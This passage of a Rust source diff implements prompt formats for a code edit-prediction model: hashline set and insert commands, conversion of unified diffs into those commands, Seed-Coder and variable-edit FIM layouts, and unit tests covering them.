body_line.trim().starts_with(INSERT_COMMAND_MARKER) + { + break; + } + scan = if body_nl < model_output.len() { + body_nl + 1 + } else { + body_nl + }; + content_end = scan; + } + + let content = &model_output[line_end..content_end]; + + if is_set { + if let Some((start_str, end_str)) = specifier.split_once('-') { + if let (Some(start), Some(end)) = + (parse_line_ref(start_str), parse_line_ref(end_str)) + { + commands.push(EditCommand::Set { + start, + end, + content, + }); + } + } else if let Some(target) = parse_line_ref(specifier) { + commands.push(EditCommand::Set { + start: target.clone(), + end: target, + content, + }); + } + } else { + let after = parse_line_ref(specifier); + commands.push(EditCommand::Insert { after, content }); + } + + offset = scan; + } + + commands + } + + /// Returns `true` if the model output contains `<|set|>` or `<|insert|>` commands + /// (as opposed to being a plain full-replacement output). + /// Strip the `{line_num}:{hash}|` prefixes from each line of a hashline-encoded + /// editable region, returning the plain text content. + pub fn strip_hashline_prefixes(region: &str) -> String { + let mut decoded: String = region + .lines() + .map(|line| line.find('|').map_or(line, |pos| &line[pos + 1..])) + .collect::>() + .join("\n"); + if region.ends_with('\n') { + decoded.push('\n'); + } + decoded + } + + pub fn output_has_edit_commands(model_output: &str) -> bool { + model_output.contains(SET_COMMAND_MARKER) + || model_output.contains(INSERT_COMMAND_MARKER) + || model_output.contains(NO_EDITS_COMMAND_MARKER) + } + + /// Apply `<|set|>` and `<|insert|>` edit commands from the model output to the + /// original editable region text. + /// + /// `editable_region` is the original text of the editable region (without hash + /// prefixes). `model_output` is the raw model response containing edit commands. + /// + /// Returns the full replacement text for the editable region. + pub fn apply_edit_commands(editable_region: &str, model_output: &str) -> String { + if model_output + .trim_start() + .starts_with(NO_EDITS_COMMAND_MARKER) + { + return editable_region.to_string(); + } + + let original_lines: Vec<&str> = editable_region.lines().collect(); + let old_hashes: Vec = original_lines + .iter() + .map(|line| hash_line(line.as_bytes())) + .collect(); + + let commands = parse_edit_commands(model_output); + + // For set operations: indexed by start line → Some((end line index, content)) + // For insert operations: indexed by line index → vec of content to insert after + // Insert-before-first is tracked separately. + let mut set_ops: Vec> = vec![None; original_lines.len()]; + let mut insert_before_first: Vec<&str> = Vec::new(); + let mut insert_after: Vec> = vec![Vec::new(); original_lines.len()]; + + for command in &commands { + match command { + EditCommand::Set { + start, + end, + content, + } => { + if start.index < old_hashes.len() + && end.index < old_hashes.len() + && start.index <= end.index + && old_hashes[start.index] == start.hash + && old_hashes[end.index] == end.hash + { + set_ops[start.index] = Some((end.index, *content)); + } + } + EditCommand::Insert { after, content } => match after { + None => insert_before_first.push(*content), + Some(line_ref) => { + if line_ref.index < old_hashes.len() + && old_hashes[line_ref.index] == line_ref.hash + { + insert_after[line_ref.index].push(*content); + } + } + }, + } + } + + let mut result = String::new(); + + // Emit any insertions before the first line + for content in &insert_before_first { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + + let mut i = 0; + while i < original_lines.len() { + if let Some((end_index, replacement)) = set_ops[i].as_ref() { + // Replace lines i..=end_index with the replacement content + result.push_str(replacement); + if !replacement.is_empty() && !replacement.ends_with('\n') { + result.push('\n'); + } + // Emit any insertions after the end of this set range + if *end_index < insert_after.len() { + for content in &insert_after[*end_index] { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + } + i = end_index + 1; + } else { + // Keep the original line + result.push_str(original_lines[i]); + result.push('\n'); + // Emit any insertions after this line + for content in &insert_after[i] { + result.push_str(content); + if !content.ends_with('\n') { + result.push('\n'); + } + } + i += 1; + } + } + + // Preserve trailing newline behavior: if the original ended with a + // newline the result already has one; if it didn't, trim the extra one + // we added. + if !editable_region.ends_with('\n') && result.ends_with('\n') { + result.pop(); + } + + result + } + + /// Convert a unified diff patch into hashline edit commands. + /// + /// Parses the unified diff `patch` directly to determine which lines of + /// `old_text` are deleted/replaced and what new lines are added, then emits + /// `<|set|>` and `<|insert|>` edit commands referencing old lines by their + /// `{index}:{hash}` identifiers. + /// + /// `cursor_offset` is an optional byte offset into the first hunk's new + /// text (context + additions) where the cursor marker should be placed. + pub fn patch_to_edit_commands( + old_text: &str, + patch: &str, + cursor_offset: Option, + ) -> Result { + let old_lines: Vec<&str> = old_text.lines().collect(); + let old_hashes: Vec = old_lines + .iter() + .map(|line| hash_line(line.as_bytes())) + .collect(); + + let mut result = String::new(); + let mut first_hunk = true; + + struct Hunk<'a> { + line_range: Range, + new_text_lines: Vec<&'a str>, + cursor_line_offset_in_new_text: Option<(usize, usize)>, + } + + // Parse the patch line by line. We only care about hunk headers, + // context, deletions, and additions. + let mut old_line_index: usize = 0; + let mut current_hunk: Option = None; + // Byte offset tracking within the hunk's new text for cursor placement. + let mut new_text_byte_offset: usize = 0; + // The line index of the last old line seen before/in the current hunk + // (used for insert-after reference). + let mut last_old_line_before_hunk: Option = None; + + fn flush_hunk( + hunk: Hunk, + last_old_line: Option, + result: &mut String, + old_hashes: &[u8], + ) { + if hunk.line_range.is_empty() { + // Pure insertion — reference the old line to insert after when in bounds. + if let Some(after) = last_old_line + && let Some(&hash) = old_hashes.get(after) + { + write!( + result, + "{INSERT_COMMAND_MARKER}{}\n", + LineRef { index: after, hash } + ) + .unwrap(); + } else { + result.push_str(INSERT_COMMAND_MARKER); + result.push('\n'); + } + } else { + let start = hunk.line_range.start; + let end_exclusive = hunk.line_range.end; + let deleted_line_count = end_exclusive.saturating_sub(start); + + if deleted_line_count == 1 { + if let Some(&hash) = old_hashes.get(start) { + write!( + result, + "{SET_COMMAND_MARKER}{}\n", + LineRef { index: start, hash } + ) + .unwrap(); + } else { + result.push_str(SET_COMMAND_MARKER); + result.push('\n'); + } + } else { + let end_inclusive = end_exclusive - 1; + match ( + old_hashes.get(start).copied(), + old_hashes.get(end_inclusive).copied(), + ) { + (Some(start_hash), Some(end_hash)) => { + write!( + result, + "{SET_COMMAND_MARKER}{}-{}\n", + LineRef { + index: start, + hash: start_hash + }, + LineRef { + index: end_inclusive, + hash: end_hash + } + ) + .unwrap(); + } + _ => { + result.push_str(SET_COMMAND_MARKER); + result.push('\n'); + } + } + } + } + for (line_offset, line) in hunk.new_text_lines.iter().enumerate() { + if let Some((cursor_line_offset, char_offset)) = hunk.cursor_line_offset_in_new_text + && line_offset == cursor_line_offset + { + result.push_str(&line[..char_offset]); + result.push_str(CURSOR_MARKER); + result.push_str(&line[char_offset..]); + continue; + } + + result.push_str(line); + } + } + + for raw_line in patch.split_inclusive('\n') { + if raw_line.starts_with("@@") { + // Flush any pending change hunk from a previous patch hunk. + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + + // Parse hunk header: @@ -old_start[,old_count] +new_start[,new_count] @@ + // We intentionally do not trust old_start as a direct local index into `old_text`, + // because some patches are produced against a larger file region and carry + // non-local line numbers. We keep indexing local by advancing from parsed patch lines. + if first_hunk { + new_text_byte_offset = 0; + first_hunk = false; + } + continue; + } + + if raw_line.starts_with("---") || raw_line.starts_with("+++") { + continue; + } + if raw_line.starts_with("\\ No newline") { + continue; + } + + if raw_line.starts_with('-') { + // Extend or start a change hunk with this deleted old line. + match &mut current_hunk { + Some(Hunk { + line_range: range, .. + }) => range.end = old_line_index + 1, + None => { + current_hunk = Some(Hunk { + line_range: old_line_index..old_line_index + 1, + new_text_lines: Vec::new(), + cursor_line_offset_in_new_text: None, + }); + } + } + old_line_index += 1; + } else if let Some(added_content) = raw_line.strip_prefix('+') { + // Place cursor marker if cursor_offset falls within this line. + let mut cursor_line_offset = None; + if let Some(cursor_off) = cursor_offset + && (first_hunk + || cursor_off >= new_text_byte_offset + && cursor_off <= new_text_byte_offset + added_content.len()) + { + let line_offset = added_content.floor_char_boundary( + cursor_off + .saturating_sub(new_text_byte_offset) + .min(added_content.len()), + ); + cursor_line_offset = Some(line_offset); + } + + new_text_byte_offset += added_content.len(); + + let hunk = current_hunk.get_or_insert(Hunk { + line_range: old_line_index..old_line_index, + new_text_lines: vec![], + cursor_line_offset_in_new_text: None, + }); + hunk.new_text_lines.push(added_content); + hunk.cursor_line_offset_in_new_text = cursor_line_offset + .map(|offset_in_line| (hunk.new_text_lines.len() - 1, offset_in_line)); + } else { + // Context line (starts with ' ' or is empty). + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + last_old_line_before_hunk = Some(old_line_index); + old_line_index += 1; + let content = raw_line.strip_prefix(' ').unwrap_or(raw_line); + new_text_byte_offset += content.len(); + } + } + + // Flush final group. + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + + // Trim a single trailing newline. + if result.ends_with('\n') { + result.pop(); + } + + if result.is_empty() { + return Ok(NO_EDITS_COMMAND_MARKER.to_string()); + } + + Ok(result) + } + + #[cfg(test)] + mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn test_format_cursor_region() { + struct Case { + name: &'static str, + context: &'static str, + editable_range: Range, + cursor_offset: usize, + expected: &'static str, + } + + let cases = [ + Case { + name: "basic_cursor_placement", + context: "hello world\n", + editable_range: 0..12, + cursor_offset: 5, + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:5c|hello<|user_cursor|> world + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "multiline_cursor_on_second_line", + context: "aaa\nbbb\nccc\n", + editable_range: 0..12, + cursor_offset: 5, // byte 5 → 1 byte into "bbb" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:23|aaa + 1:26|b<|user_cursor|>bb + 2:29|ccc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "no_trailing_newline_in_context", + context: "line1\nline2", + editable_range: 0..11, + cursor_offset: 3, + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:d9|lin<|user_cursor|>e1 + 1:da|line2 + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "leading_newline_in_editable_region", + context: "\nabc\n", + editable_range: 0..5, + cursor_offset: 2, // byte 2 = 'a' in "abc" (after leading \n) + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:00| + 1:26|a<|user_cursor|>bc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "with_suffix", + context: "abc\ndef", + editable_range: 0..4, // editable region = "abc\n", suffix = "def" + cursor_offset: 2, + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|ab<|user_cursor|>c + <|fim_suffix|> + def + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_two_byte_chars", + context: "héllo\n", + editable_range: 0..7, + cursor_offset: 3, // byte 3 = after "hé" (h=1 byte, é=2 bytes), before "llo" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:1b|hé<|user_cursor|>llo + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_three_byte_chars", + context: "日本語\n", + editable_range: 0..10, + cursor_offset: 6, // byte 6 = after "日本" (3+3 bytes), before "語" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:80|日本<|user_cursor|>語 + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_four_byte_chars", + context: "a🌍b\n", + editable_range: 0..7, + cursor_offset: 5, // byte 5 = after "a🌍" (1+4 bytes), before "b" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:6b|a🌍<|user_cursor|>b + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_at_start_of_region_not_placed", + context: "abc\n", + editable_range: 0..4, + cursor_offset: 0, // cursor_offset(0) > offset(0) is false → cursor not placed + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|abc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_at_end_of_line_not_placed", + context: "abc\ndef\n", + editable_range: 0..8, + cursor_offset: 3, // byte 3 = the \n after "abc" → falls between lines, not placed + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|abc + 1:2f|def + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_offset_relative_to_context_not_editable_region", + // cursor_offset is relative to `context`, so when editable_range.start > 0, + // write_cursor_excerpt_section must subtract it before comparing against + // per-line offsets within the editable region. + context: "pre\naaa\nbbb\nsuf\n", + editable_range: 4..12, // editable region = "aaa\nbbb\n" + cursor_offset: 9, // byte 9 in context = second 'b' in "bbb" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + pre + <|fim_middle|>current + 0:23|aaa + 1:26|b<|user_cursor|>bb + <|fim_suffix|> + suf + <|fim_middle|>updated + "}, + }, + ]; + + for case in &cases { + let mut prompt = String::new(); + hashline::write_cursor_excerpt_section( + &mut prompt, + Path::new("test.rs"), + case.context, + &case.editable_range, + case.cursor_offset, + ); + assert_eq!(prompt, case.expected, "failed case: {}", case.name); + } + } + + #[test] + fn test_apply_edit_commands() { + struct Case { + name: &'static str, + original: &'static str, + model_output: &'static str, + expected: &'static str, + } + + let cases = vec![ + Case { + name: "set_single_line", + original: indoc! {" + let mut total = 0; + for product in products { + total += ; + } + total + "}, + model_output: indoc! {" + <|set|>2:87 + total += product.price; + "}, + expected: indoc! {" + let mut total = 0; + for product in products { + total += product.price; + } + total + "}, + }, + Case { + name: "set_range", + original: indoc! {" + fn foo() { + let x = 1; + let y = 2; + let z = 3; + } + "}, + model_output: indoc! {" + <|set|>1:46-3:4a + let sum = 6; + "}, + expected: indoc! {" + fn foo() { + let sum = 6; + } + "}, + }, + Case { + name: "insert_after_line", + original: indoc! {" + fn main() { + let x = 1; + } + "}, + model_output: indoc! {" + <|insert|>1:46 + let y = 2; + "}, + expected: indoc! {" + fn main() { + let x = 1; + let y = 2; + } + "}, + }, + Case { + name: "insert_before_first", + original: indoc! {" + let x = 1; + let y = 2; + "}, + model_output: indoc! {" + <|insert|> + use std::io; + "}, + expected: indoc! {" + use std::io; + let x = 1; + let y = 2; + "}, + }, + Case { + name: "set_with_cursor_marker", + original: indoc! {" + fn main() { + println!(); + } + "}, + model_output: indoc! {" + <|set|>1:34 + eprintln!(\"<|user_cursor|>\"); + "}, + expected: indoc! {" + fn main() { + eprintln!(\"<|user_cursor|>\"); + } + "}, + }, + Case { + name: "multiple_set_commands", + original: indoc! {" + aaa + bbb + ccc + ddd + "}, + model_output: indoc! {" + <|set|>0:23 + AAA + <|set|>2:29 + CCC + "}, + expected: indoc! {" + AAA + bbb + CCC + ddd + "}, + }, + Case { + name: "set_range_multiline_replacement", + original: indoc! {" + fn handle_submit() { + } + + fn handle_keystroke() { + "}, + model_output: indoc! {" + <|set|>0:3f-1:7d + fn handle_submit(modal_state: &mut ModalState) { + <|user_cursor|> + } + "}, + expected: indoc! {" + fn handle_submit(modal_state: &mut ModalState) { + <|user_cursor|> + } + + fn handle_keystroke() { + "}, + }, + Case { + name: "no_edit_commands_returns_original", + original: indoc! {" + hello + world + "}, + model_output: "some random text with no commands", + expected: indoc! {" + hello + world + "}, + }, + Case { + name: "no_edits_command_returns_original", + original: indoc! {" + hello + world + "}, + model_output: "<|no_edits|>", + expected: indoc! {" + hello + world + "}, + }, + Case { + name: "wrong_hash_set_ignored", + original: indoc! {" + aaa + bbb + "}, + model_output: indoc! {" + <|set|>0:ff + ZZZ + "}, + expected: indoc! {" + aaa + bbb + "}, + }, + Case { + name: "insert_and_set_combined", + original: indoc! {" + alpha + beta + gamma + "}, + model_output: indoc! {" + <|set|>0:06 + ALPHA + <|insert|>1:9c + beta_extra + "}, + expected: indoc! {" + ALPHA + beta + beta_extra + gamma + "}, + }, + Case { + name: "no_trailing_newline_preserved", + original: "hello\nworld", + model_output: indoc! {" + <|set|>0:14 + HELLO + "}, + expected: "HELLO\nworld", + }, + Case { + name: "set_range_hash_mismatch_in_end_bound", + original: indoc! {" + one + two + three + "}, + model_output: indoc! {" + <|set|>0:42-2:ff + ONE_TWO_THREE + "}, + expected: indoc! {" + one + two + three + "}, + }, + Case { + name: "set_range_start_greater_than_end_ignored", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + <|set|>2:63-1:62 + X + "}, + expected: indoc! {" + a + b + c + "}, + }, + Case { + name: "insert_out_of_bounds_ignored", + original: indoc! {" + x + y + "}, + model_output: indoc! {" + <|insert|>99:aa + z + "}, + expected: indoc! {" + x + y + "}, + }, + Case { + name: "set_out_of_bounds_ignored", + original: indoc! {" + x + y + "}, + model_output: indoc! {" + <|set|>99:aa + z + "}, + expected: indoc! {" + x + y + "}, + }, + Case { + name: "malformed_set_command_ignored", + original: indoc! {" + alpha + beta + "}, + model_output: indoc! {" + <|set|>not-a-line-ref + UPDATED + "}, + expected: indoc! {" + alpha + beta + "}, + }, + Case { + name: "malformed_insert_hash_treated_as_before_first", + original: indoc! {" + alpha + beta + "}, + model_output: indoc! {" + <|insert|>1:nothex + preamble + "}, + expected: indoc! {" + preamble + alpha + beta + "}, + }, + Case { + name: "set_then_insert_same_target_orders_insert_after_replacement", + original: indoc! {" + cat + dog + "}, + model_output: indoc! {" + <|set|>0:38 + CAT + <|insert|>0:38 + TAIL + "}, + expected: indoc! {" + CAT + TAIL + dog + "}, + }, + Case { + name: "overlapping_set_ranges_last_wins", + original: indoc! {" + a + b + c + d + "}, + model_output: indoc! {" + <|set|>0:61-2:63 + FIRST + <|set|>1:62-3:64 + SECOND + "}, + expected: indoc! {" + FIRST + d + "}, + }, + Case { + name: "insert_before_first_and_after_line", + original: indoc! {" + a + b + "}, + model_output: indoc! {" + <|insert|> + HEAD + <|insert|>0:61 + MID + "}, + expected: indoc! {" + HEAD + a + MID + b + "}, + }, + ]; + + for case in &cases { + let result = hashline::apply_edit_commands(case.original, &case.model_output); + assert_eq!(result, case.expected, "failed case: {}", case.name); + } + } + + #[test] + fn test_output_has_edit_commands() { + assert!(hashline::output_has_edit_commands(&format!( + "{}0:ab\nnew", + SET_COMMAND_MARKER + ))); + assert!(hashline::output_has_edit_commands(&format!( + "{}0:ab\nnew", + INSERT_COMMAND_MARKER + ))); + assert!(hashline::output_has_edit_commands(&format!( + "some text\n{}1:cd\nstuff", + SET_COMMAND_MARKER + ))); + assert!(!hashline::output_has_edit_commands("just plain text")); + assert!(!hashline::output_has_edit_commands("NO_EDITS")); + assert!(hashline::output_has_edit_commands("<|no_edits|>")); + } + + // ---- hashline::patch_to_edit_commands round-trip tests ---- + + #[test] + fn test_patch_to_edit_commands() { + struct Case { + name: &'static str, + old: &'static str, + patch: &'static str, + expected_new: &'static str, + } + + let cases = [ + Case { + name: "single_line_replacement", + old: indoc! {" + let mut total = 0; + for product in products { + total += ; + } + total + "}, + patch: indoc! {" + @@ -1,5 +1,5 @@ + let mut total = 0; + for product in products { + - total += ; + + total += product.price; + } + total + "}, + expected_new: indoc! {" + let mut total = 0; + for product in products { + total += product.price; + } + total + "}, + }, + Case { + name: "multiline_replacement", + old: indoc! {" + fn foo() { + let x = 1; + let y = 2; + let z = 3; + } + "}, + patch: indoc! {" + @@ -1,5 +1,3 @@ + fn foo() { + - let x = 1; + - let y = 2; + - let z = 3; + + let sum = 1 + 2 + 3; + } + "}, + expected_new: indoc! {" + fn foo() { + let sum = 1 + 2 + 3; + } + "}, + }, + Case { + name: "insertion", + old: indoc! {" + fn main() { + let x = 1; + } + "}, + patch: indoc! {" + @@ -1,3 +1,4 @@ + fn main() { + let x = 1; + + let y = 2; + } + "}, + expected_new: indoc! {" + fn main() { + let x = 1; + let y = 2; + } + "}, + }, + Case { + name: "insertion_before_first", + old: indoc! {" + let x = 1; + let y = 2; + "}, + patch: indoc! {" + @@ -1,2 +1,3 @@ + +use std::io; + let x = 1; + let y = 2; + "}, + expected_new: indoc! {" + use std::io; + let x = 1; + let y = 2; + "}, + }, + Case { + name: "deletion", + old: indoc! {" + aaa + bbb + ccc + ddd + "}, + patch: indoc! {" + @@ -1,4 +1,2 @@ + aaa + -bbb + -ccc + ddd + "}, + expected_new: indoc! {" + aaa + ddd + "}, + }, + Case { + name: "multiple_changes", + old: indoc! {" + alpha + beta + gamma + delta + epsilon + "}, + patch: indoc! {" + @@ -1,5 +1,5 @@ + -alpha + +ALPHA + beta + gamma + -delta + +DELTA + epsilon + "}, + expected_new: indoc! {" + ALPHA + beta + gamma + DELTA + epsilon + "}, + }, + Case { + name: "replace_with_insertion", + old: indoc! {r#" + fn handle() { + modal_state.close(); + modal_state.dismiss(); + "#}, + patch: indoc! {r#" + @@ -1,3 +1,4 @@ + fn handle() { + modal_state.close(); + + eprintln!(""); + modal_state.dismiss(); + "#}, + expected_new: indoc! {r#" + fn handle() { + modal_state.close(); + eprintln!(""); + modal_state.dismiss(); + "#}, + }, + Case { + name: "complete_replacement", + old: indoc! {" + aaa + bbb + ccc + "}, + patch: indoc! {" + @@ -1,3 +1,3 @@ + -aaa + -bbb + -ccc + +xxx + +yyy + +zzz + "}, + expected_new: indoc! {" + xxx + yyy + zzz + "}, + }, + Case { + name: "add_function_body", + old: indoc! {" + fn foo() { + modal_state.dismiss(); + } + + fn + + fn handle_keystroke() { + "}, + patch: indoc! {" + @@ -1,6 +1,8 @@ + fn foo() { + modal_state.dismiss(); + } + + -fn + +fn handle_submit() { + + todo() + +} + + fn handle_keystroke() { + "}, + expected_new: indoc! {" + fn foo() { + modal_state.dismiss(); + } + + fn handle_submit() { + todo() + } + + fn handle_keystroke() { + "}, + }, + Case { + name: "with_cursor_offset", + old: indoc! {r#" + fn main() { + println!(); + } + "#}, + patch: indoc! {r#" + @@ -1,3 +1,3 @@ + fn main() { + - println!(); + + eprintln!(""); + } + "#}, + expected_new: indoc! {r#" + fn main() { + eprintln!("<|user_cursor|>"); + } + "#}, + }, + Case { + name: "non_local_hunk_header_pure_insertion_repro", + old: indoc! {" + aaa + bbb + "}, + patch: indoc! {" + @@ -20,2 +20,3 @@ + aaa + +xxx + bbb + "}, + expected_new: indoc! {" + aaa + xxx + bbb + "}, + }, + Case { + name: "empty_patch_produces_no_edits_marker", + old: indoc! {" + aaa + bbb + "}, + patch: "@@ -20,2 +20,3 @@\n", + expected_new: indoc! {" + aaa + bbb + "}, + }, + ]; + + for case in &cases { + // The cursor_offset for patch_to_edit_commands is relative to + // the first hunk's new text (context + additions). We compute + // it by finding where the marker sits in the expected output + // (which mirrors the new text of the hunk). + let cursor_offset = case.expected_new.find(CURSOR_MARKER); + + let commands = + hashline::patch_to_edit_commands(case.old, case.patch, cursor_offset) + .unwrap_or_else(|e| panic!("failed case {}: {e}", case.name)); + + assert!( + hashline::output_has_edit_commands(&commands), + "case {}: expected edit commands, got: {commands:?}", + case.name, + ); + + let applied = hashline::apply_edit_commands(case.old, &commands); + assert_eq!(applied, case.expected_new, "case {}", case.name); + } + } + } +} + +pub mod seed_coder { + //! Seed-Coder prompt format using SPM (Suffix-Prefix-Middle) FIM mode. + //! + //! Seed-Coder uses different FIM tokens and order than Qwen: + //! - SPM order: suffix comes FIRST, then prefix, then middle + //! - Tokens: `<[fim-suffix]>`, `<[fim-prefix]>`, `<[fim-middle]>` + //! - File markers: StarCoder-style `path` (single token + path) + //! + //! All context (related files, edit history) goes in the PREFIX section. + //! The suffix contains only code after the editable region. + //! + //! Example prompt: + //! + //! <[fim-suffix]> + //! code after editable region + //! <[fim-prefix]>related/file.py + //! related file content + //! + //! edit_history + //! --- a/some_file.py + //! +++ b/some_file.py + //! -old + //! +new + //! + //! path/to/target_file.py + //! code before editable region + //! <<<<<<< CURRENT + //! code that + //! needs to<|user_cursor|> + //! be rewritten + //! ======= + //! <[fim-middle]> + //! + //! Expected output (model generates): + //! + //! updated + //! code with + //! changes applied + //! >>>>>>> UPDATED + + use super::*; + + pub const FIM_SUFFIX: &str = "<[fim-suffix]>"; + pub const FIM_PREFIX: &str = "<[fim-prefix]>"; + pub const FIM_MIDDLE: &str = "<[fim-middle]>"; + pub const FILE_MARKER: &str = ""; + + pub const START_MARKER: &str = "<<<<<<< CURRENT\n"; + pub const SEPARATOR: &str = "=======\n"; + pub const END_MARKER: &str = ">>>>>>> UPDATED\n"; + + pub const NO_EDITS: &str = "NO_EDITS\n"; + + pub fn special_tokens() -> &'static [&'static str] { + &[ + FIM_SUFFIX, + FIM_PREFIX, + FIM_MIDDLE, + FILE_MARKER, + START_MARKER, + SEPARATOR, + END_MARKER, + CURSOR_MARKER, + ] + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + ) { + let section = build_cursor_prefix_section(path, context, editable_range, cursor_offset); + prompt.push_str(§ion); + } + + pub fn format_prompt_with_budget( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + events: &[Arc], + related_files: &[RelatedFile], max_tokens: usize, ) -> String { - let suffix_section = build_suffix_section(context, editable_range); let cursor_prefix_section = build_cursor_prefix_section(path, context, editable_range, cursor_offset); + assemble_fim_prompt( + context, + editable_range, + &cursor_prefix_section, + events, + related_files, + max_tokens, + ) + } + + pub fn assemble_fim_prompt( + context: &str, + editable_range: &Range, + cursor_prefix_section: &str, + events: &[Arc], + related_files: &[RelatedFile], + max_tokens: usize, + ) -> String { + let suffix_section = build_suffix_section(context, editable_range); + + let suffix_tokens = estimate_tokens(suffix_section.len() + FIM_PREFIX.len()); + let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len() + FIM_MIDDLE.len()); + let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens); + + let edit_history_section = super::format_edit_history_within_budget( + events, + FILE_MARKER, + "edit_history", + budget_after_cursor, + max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder), + ); + let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len()); + let budget_after_edit_history = + budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len()); + + let related_files_section = super::format_related_files_within_budget( + related_files, + FILE_MARKER, + "", + budget_after_edit_history, + ); + + let mut prompt = String::new(); + prompt.push_str(&suffix_section); + prompt.push_str(FIM_PREFIX); + prompt.push_str(&related_files_section); + if !related_files_section.is_empty() { + prompt.push('\n'); + } + prompt.push_str(&edit_history_section); + if !edit_history_section.is_empty() { + prompt.push('\n'); + } + prompt.push_str(cursor_prefix_section); + prompt.push_str(FIM_MIDDLE); + + prompt + } + + fn build_suffix_section(context: &str, editable_range: &Range) -> String { + let mut section = String::new(); + section.push_str(FIM_SUFFIX); + section.push_str(&context[editable_range.end..]); + if !section.ends_with('\n') { + section.push('\n'); + } + section + } + + fn build_cursor_prefix_section( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + ) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + section.push_str(START_MARKER); + section.push_str(&context[editable_range.start..cursor_offset]); + section.push_str(CURSOR_MARKER); + section.push_str(&context[cursor_offset..editable_range.end]); + if !section.ends_with('\n') { + section.push('\n'); + } + section.push_str(SEPARATOR); + section + } + + /// Format patch as containing no changes if it's empty; otherwise return None. + pub(crate) fn no_edits(patch: &str) -> Option { + // Count lines in the patch + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + Some(format!("{NO_EDITS}{END_MARKER}")) + } else { + None + } + } +} + +pub mod v0304_variable_edit { + //! A prompt format with no fixed editable region. The entire context is shown + //! to the model, and it chooses which text to replace by outputting surrounding + //! context lines with `<|fim_middle|>` and `<|fim_suffix|>` delimiting the new + //! text. + //! + //! Example prompt: + //! + //! <|file_sep|>path/to/file.py + //! zero + //! one + //! two + //! three<|user_cursor|> + //! four + //! five + //! <|fim_prefix|> + // + //! Expected output (model generates): + //! + //! two + //! <|fim_middle|> + //! THREE + //! <|fim_suffix|> + //! four + //! + //! The output means: find "two\n...\nfour" in the context, and replace + //! everything between "two\n" and "four" with "THREE\n". + + use super::*; + + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, + path: &Path, + context: &str, + cursor_offset: usize, + ) { + let path_str = path.to_string_lossy(); + write!(prompt, "<|file_sep|>{}\n", path_str).ok(); + + prompt.push_str(&context[..cursor_offset]); + prompt.push_str(CURSOR_MARKER); + prompt.push_str(&context[cursor_offset..]); + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + prompt.push_str("<|fim_prefix|>\n") + } + + /// Apply a variable-edit model output to the original context text. + /// + /// The model output has the form: + /// + /// - prefix context lines + /// - `<|fim_middle|>` + /// - new text + /// - `<|fim_suffix|>` + /// - suffix context lines + /// + /// We locate the prefix/suffix context lines in the original text and replace + /// everything between them with the new text. + pub fn apply_variable_edit( + context: &str, + model_output: &str, + ) -> Result<(Range, String)> { + let (prefix_context, rest) = model_output + .split_once("<|fim_middle|>\n") + .or_else(|| model_output.split_once("<|fim_middle|>")) + .ok_or_else(|| anyhow::anyhow!("missing <|fim_middle|> in model output"))?; + + let (new_text, suffix_context) = rest + .split_once("<|fim_suffix|>\n") + .or_else(|| rest.split_once("<|fim_suffix|>")) + .unwrap_or((rest, "")); + + let suffix_context = if prefix_context.is_empty() && !suffix_context.is_empty() { + suffix_context.strip_prefix('\n').unwrap_or(suffix_context) + } else { + suffix_context + }; + + let prefix_offset = find_substring_at_line_boundary(context, prefix_context) + .ok_or_else(|| anyhow!("could not locate prefix lines"))? + + prefix_context.len(); + let 